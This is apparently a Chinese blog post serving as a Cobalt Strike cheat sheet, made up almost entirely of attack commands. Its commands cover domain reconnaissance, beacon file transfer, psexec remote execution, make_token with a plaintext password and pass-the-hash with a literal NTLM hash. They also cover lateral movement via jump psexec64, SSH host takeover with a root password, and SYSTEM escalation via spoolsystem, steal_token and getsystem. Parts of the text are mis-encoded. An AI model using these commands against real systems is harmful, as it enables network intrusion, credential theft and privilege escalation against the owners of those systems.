cs的常用命令操作
信息收集
#列出正在登陸的用戶 net logons #列出域控(組) net domain_controllers #列出域控列表 net dclist #顯示當(dāng)前域 net domain #列出當(dāng)前session net sessions #列出盤(pán)符 drives文件上傳
上傳
cd C:\Windows\apppatch upload 1.txt下載
download xxx.txt列出當(dāng)前執(zhí)行時(shí)間很久的任務(wù)并刪除
jobs jobkill取消正在下載的文件
cancel 1.txt創(chuàng)建憑據(jù)并執(zhí)行命令(無(wú)回顯)
工作組中如果兩個(gè)機(jī)器密碼或者說(shuō)登陸憑據(jù)是相同的,那么可以直接dir \ip\c$ 成功。
#在有憑據(jù)的情況下可以執(zhí)行命令 remote-exec psexec \\192.168.171.142 whoami憑據(jù)錯(cuò)誤時(shí)的報(bào)錯(cuò):
此時(shí)發(fā)現(xiàn)命令執(zhí)行成功
利用smb beacon上線爆出密碼的機(jī)器
創(chuàng)建smb監(jiān)聽(tīng)并命名為q
#如果得到明文 make_token workgroup\administrator 123123 #如果得到hash pth administrator 579110c49145015c47ecd267657d3174 #上線 jump psexec64 192.168.171.142 q如果機(jī)器出網(wǎng),可以選擇上線之后再spawn得到一個(gè)直連的session。
connect命令
可創(chuàng)建一個(gè)tcp的listener,然后使用connect命令連接:
更改當(dāng)前beacon的父進(jìn)程
返回system權(quán)限的shell
得到system權(quán)限后,需要重新執(zhí)行木馬文件才能獲得sys權(quán)限的shell
execute C:\Users\Administrator\Desktop\beacon.exe上線ssh機(jī)器
ssh 192.168.171.139 root 1使用spoolsystem獲得system權(quán)限
需要有SeImpersonatePrivilege權(quán)限
spoolsystem spawn spoolsystem selfinject steal_token 一個(gè)system權(quán)限程序的pid shell whoami spoolsystem spawn spoolsystem selfinject getsystem shell whoami
總結(jié)
- 上一篇: 数据分析拆解方法
- 下一篇: 《数字图像处理》冈萨雷斯版 读书笔记(一